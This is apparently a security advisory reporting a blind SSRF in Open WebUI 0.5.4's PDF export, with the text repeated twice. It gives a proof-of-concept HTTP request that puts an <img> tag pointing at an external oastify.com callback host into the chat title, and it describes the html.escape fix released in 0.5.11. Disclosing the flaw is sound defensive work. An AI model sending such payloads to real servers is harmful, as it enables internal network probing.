Summary
Blind server side request forgery (SSRF) via the PDF generate function.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.
Details
In the PDF export, user inputs are interpreted as HTML and embedded into the PDF. According to tests, scripts and some potentially dangerous tags (iFrame, Object, etc.) are blocked, preventing server-side content from being read through this vulnerability. However, an image tag can be used to force a server-side request (SSRF), as shown in the following below.
PoC
Start a chat and export the PDF:
Intercept the request and insert an <img> tag into the title:
POST /api/v1/utils/pdf HTTP/2
Host: domain.local
//Some headers removed
Content-Type: application/json
Content-Length: 541
Te: trailers
{"title":"<img src='https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com' />","messages":[{"id":"81f24589-384d-431c-a26c-5cd3382ac941","parentId":null,"childrenIds":["0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e"],"role":"user","content":"hallo","timestamp":1736932102,"models":["gpt-4o-POC"]},{"parentId":"81f24589-384d-431c-a26c-5cd3382ac941","id":"0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e","childrenIds":[],"role":"assistant","content":"Hallo! Wie kann ich Ihnen helfen?","model":"gpt-4o-POC","modelName":"gpt-4o-POC","modelIdx":0,"userContext":null,"timestamp":1736932103,"done":true}]}A HTTPS callback was received at https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com.
Impact
A user can force server-side GET requests. During the available testing time, no method was found to read the responses (Blind SSRF). Nonetheless, this should be prevented, as an attacker could enumerate internal assets through response delays and trigger arbitrary GET requests.
Resolution
Fixed in commit 167c8bf00, first released in v0.5.11 (2025-02). The fix wraps every user-controllable field that flows into the PDF HTML template (title, content, role, model, formatted date) in html.escape() before the template f-string is fed to fpdf2.write_html(). The PoC payload <img src='...' /> is escaped to <img src='...' /> and rendered as literal text by fpdf2, with no HTML parsing and no outbound request. Users on >= 0.5.11 are not affected.
References
simioni87 Reporter
Summary
Blind server side request forgery (SSRF) via the PDF generate function.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.
Details
In the PDF export, user inputs are interpreted as HTML and embedded into the PDF. According to tests, scripts and some potentially dangerous tags (iFrame, Object, etc.) are blocked, preventing server-side content from being read through this vulnerability. However, an image tag can be used to force a server-side request (SSRF), as shown in the following below.
PoC
Start a chat and export the PDF:
Intercept the request and insert an
<img>tag into thetitle:A HTTPS callback was received at https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com.
Impact
A user can force server-side GET requests. During the available testing time, no method was found to read the responses (Blind SSRF). Nonetheless, this should be prevented, as an attacker could enumerate internal assets through response delays and trigger arbitrary GET requests.
Resolution
Fixed in commit 167c8bf00, first released in v0.5.11 (2025-02). The fix wraps every user-controllable field that flows into the PDF HTML template (
title,content,role,model, formatted date) inhtml.escape()before the template f-string is fed tofpdf2.write_html(). The PoC payload<img src='...' />is escaped to<img src='...' />and rendered as literal text by fpdf2, with no HTML parsing and no outbound request. Users on>= 0.5.11are not affected.References